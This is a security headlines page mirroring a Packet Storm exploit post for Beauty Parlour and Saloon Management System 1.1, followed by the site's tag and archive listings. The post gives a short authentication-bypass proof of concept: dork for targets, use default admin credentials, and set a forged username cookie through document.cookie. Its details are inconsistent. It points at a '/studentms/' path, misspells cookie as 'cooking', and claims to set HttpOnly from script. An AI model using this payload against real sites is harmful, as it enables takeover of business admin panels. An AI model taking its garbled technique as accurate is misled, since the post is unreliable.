Security
Headlines
HeadlinesLatestCVEs

Headline

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

File Tags

  • ActiveX (933)
  • Advisory (86,753)
  • Arbitrary (17,058)
  • BBS (2,859)
  • Bypass (1,912)
  • CGI (1,047)
  • Code Execution (7,889)
  • Conference (692)
  • Cracker (844)
  • CSRF (3,422)
  • DoS (25,235)
  • Encryption (2,394)
  • Exploit (54,198)
  • File Inclusion (4,273)
  • File Upload (1,011)
  • Firewall (822)
  • Info Disclosure (2,913)
  • Intrusion Detection (918)
  • Java (3,156)
  • JavaScript (908)
  • Kernel (7,270)
  • Local (14,848)
  • Magazine (587)
  • Overflow (13,212)
  • Perl (1,435)
  • PHP (5,262)
  • Proof of Concept (2,406)
  • Protocol (3,749)
  • Python (1,655)
  • Remote (31,853)
  • Root (3,671)
  • Rootkit (529)
  • Ruby (640)
  • Scanner (1,657)
  • Security Tool (8,046)
  • Shell (3,303)
  • Shellcode (1,219)
  • Sniffer (904)
  • Spoof (2,292)
  • SQL Injection (16,711)
  • TCP (2,463)
  • Trojan (690)
  • UDP (919)
  • Virus (673)
  • Vulnerability (33,063)
  • Web (10,135)
  • Whitepaper (3,783)
  • x86 (970)
  • XSS (18,289)
  • Other

File Archives

  • September 2024
  • August 2024
  • July 2024
  • June 2024
  • May 2024
  • April 2024
  • March 2024
  • February 2024
  • January 2024
  • December 2023
  • November 2023
  • October 2023
  • Older

Systems

  • AIX (430)
  • Apple (2,104)
  • BSD (378)
  • CentOS (61)
  • Cisco (1,954)
  • Debian (7,119)
  • Fedora (1,693)
  • FreeBSD (1,247)
  • Gentoo (4,567)
  • HPUX (881)
  • iOS (387)
  • iPhone (108)
  • IRIX (220)
  • Juniper (71)
  • Linux (51,136)
  • Mac OS X (696)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (489)
  • RedHat (16,775)
  • Slackware (941)
  • Solaris (1,615)
  • SUSE (1,444)
  • Ubuntu (9,828)
  • UNIX (9,454)
  • UnixWare (188)
  • Windows (6,766)
  • Other

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution